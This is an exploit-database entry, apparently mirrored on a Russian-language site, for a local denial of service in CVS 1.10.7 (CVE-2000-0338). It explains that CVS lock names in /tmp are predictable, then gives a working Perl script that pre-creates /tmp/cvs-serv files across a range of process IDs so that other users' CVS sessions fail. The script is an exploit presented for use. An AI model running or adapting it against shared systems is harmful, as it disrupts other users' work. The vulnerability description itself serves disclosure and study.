- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19870
- Проверка EDB
-
- Пройдено
- Автор
- MICHAL SZYMANSKI
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2000-0338
- Дата публикации
- 2000-04-23
CVS 1.10.7 - Local Denial of Service
Код:
source: https://www.securityfocus.com/bid/1136/info
CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken.
The following perl script will create many directories in /tmp with incrementing pids:
#!/usr/bin/perl
$min=400;
$max=4000;
for ($x=$min;$x<=$max;$x++) {
open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!";
chmod 0600, "/tmp/cvs-serv$x";
close CVSTMP;
}- Источник
- www.exploit-db.com
